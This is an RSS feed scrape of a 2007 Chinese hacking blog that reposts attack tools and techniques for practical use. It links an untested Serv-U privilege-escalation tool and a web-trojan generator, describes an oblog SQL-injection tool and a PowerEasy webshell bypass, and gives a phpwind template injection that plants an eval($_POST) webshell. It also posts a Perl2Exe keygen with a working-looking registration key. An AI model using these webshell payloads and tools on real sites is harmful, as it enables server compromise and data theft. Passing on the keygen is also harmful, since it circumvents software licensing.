<![CDATA[装B吧...]]> http://hi.baidu.com http://hi.baidu.com http://img.baidu.com/img/logo-hi.gif http://hi.baidu.com/hehe9011 zh-cn www.baidu.com 5 <![CDATA[...]]> 类别:心情涂鸦/mood 查看评论]]> Thu, 26 Apr 2007 19:06:56 +0800 http://hi.baidu.com/hehe9011/blog/item/47fb9b514f26602543a75b6c.html <![CDATA[oblog4.0&4.5漏洞利用/工具/软件]]> 来自:http://www.hackm.com/read.php?tid-2014.html

作者:28度的冰

写得相当的草率。
1,直接爆密码的只是考虑到了直接报错能爆出密码的情况。所以没有涉及到特征字符,也没有用二分法猜解密码。所以不太好用。
2,sql的如果遇到sa执行命令自然爽,可是我测试条件有限,没有能遇到sa的,所以没有完善代码,如果点了命令之后蹦出一个msgbox那说明命令执行成功...。对于DBO权限,列目录还是可以的,只不过有些不方便。。。
对了 好像还少一个log备份shell功能

类别:黑客软件/tools 查看评论]]> Tue, 24 Apr 2007 19:30:35 +0800 http://hi.baidu.com/hehe9011/blog/item/7ed5dc338104bb42ac4b5f60.html <![CDATA[Shell I---phpshell]]> 关于为什么起这个名字,作者说:“Couldn't think of a name so it became "Shell I"...”
phpshell不稀奇了,介绍这个phpshell主要是他有一个比较有新意的功能:md5 cracker with custom options
可以直接在这个phpshell中利用当前网站服务器进行md5的暴力破解。

类别:黑客软件/tools 查看评论]]> Mon, 23 Apr 2007 19:09:46 +0800 http://hi.baidu.com/hehe9011/blog/item/9b9dcb1b6de09afbae51330e.html <![CDATA[OBLOG4.0 OBLOG4.5通杀]]>
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8
类别:黑客技术/archives 查看评论]]> Sun, 22 Apr 2007 17:41:25 +0800 http://hi.baidu.com/hehe9011/blog/item/f26998160ebaca50f3de32d0.html <![CDATA[SU通杀提权利用工具]]> 通杀所有版本SERV-U的提权程序,未做测试,内附动画演示,

哪个小朋友试了拜托写下...THX~~~

下载地址:http://www.live-share.com/files/207829/serv-u_0day.rar.html


类别:黑客软件/tools 查看评论]]> Sun, 22 Apr 2007 17:39:03 +0800 http://hi.baidu.com/hehe9011/blog/item/a9b8d4c8b9b9ac167f3e6fd6.html <![CDATA[Perl2Exe V8.80 + 注册机]]>
来源:7jdg's Blog

很久没有用过这东西了,今天从机子上找出来一个是8.4版的,老的不能用了..来个新的,带注册机
引用
C:p2x-8.80-Win32>perl2exe -register
Perl2Exe V8.80 Copyright (c) 1997-2006 IndigoSTAR Software
Please enter your registration key, or press enter to cancel
1v1:name:20070320,54419
Registered
引用
C:p2x-8.80-Win32>perl2exe
Per
类别:黑客软件/tools 查看评论]]> Sat, 21 Apr 2007 19:29:28 +0800 http://hi.baidu.com/hehe9011/blog/item/1ae55ceea61237fab2fb9597.html <![CDATA[SQL Injection技巧的演练]]> 来自:http://www.securiteam.com/
翻译:DemonAlex
更新:2006年11月11日  

摘要:
下文是为了帮助那些希望能掌握这个漏洞的运用、并想得知如何保护自己免受这种漏洞攻击的人了解该漏 洞的本质而写的。

详细资料:

1.0绪论
当一台机器只开放了80端口(这里指的是提供HTTP服务)时,可能你的大多数漏洞扫描器都不能给到你很多 有价值的信息(漏洞信息),倘
类别:黑客技术/archives 查看评论]]> Thu, 19 Apr 2007 18:58:57 +0800 http://hi.baidu.com/hehe9011/blog/item/2c4a56432b14ee109213c63e.html <![CDATA[突破动易拿webshell]]> 来源:红狼安全小组(www.wolfexp.net,www.crst.com.cn)


原理    : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
突破的前提条件是      : 服务器是win2003 全功能的空间


**************************************************
'函数名:UserNamefilter(
'作   用:过滤用户名(增强过滤,用户名现
类别:黑客技术/archives 查看评论]]> Wed, 18 Apr 2007 18:29:54 +0800 http://hi.baidu.com/hehe9011/blog/item/7b62bc12f08c99cfc3fd7887.html <![CDATA[平凡多功能自升级网马生成器超酷版V1.0]]> 来自安全警戒线论坛~~


平凡多功能自升级网马生成器超酷版V1.0
下载地址:http://www.live-share.com/files/204599/4.18.rar.html

类别:黑客软件/tools 查看评论]]> Wed, 18 Apr 2007 18:26:09 +0800 http://hi.baidu.com/hehe9011/blog/item/8fac9982c63696be6c811985.html <![CDATA[phpwind后台拿shell 方法]]> 来源:猪猪's blog

方式1 模板法

进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<

例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST[’a’]);
print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}

而后得到一个shell


类别:黑客技术/archives 查看评论]]> Mon, 16 Apr 2007 19:33:01 +0800 http://hi.baidu.com/hehe9011/blog/item/e6c64fedaac5ded5b21cb14e.html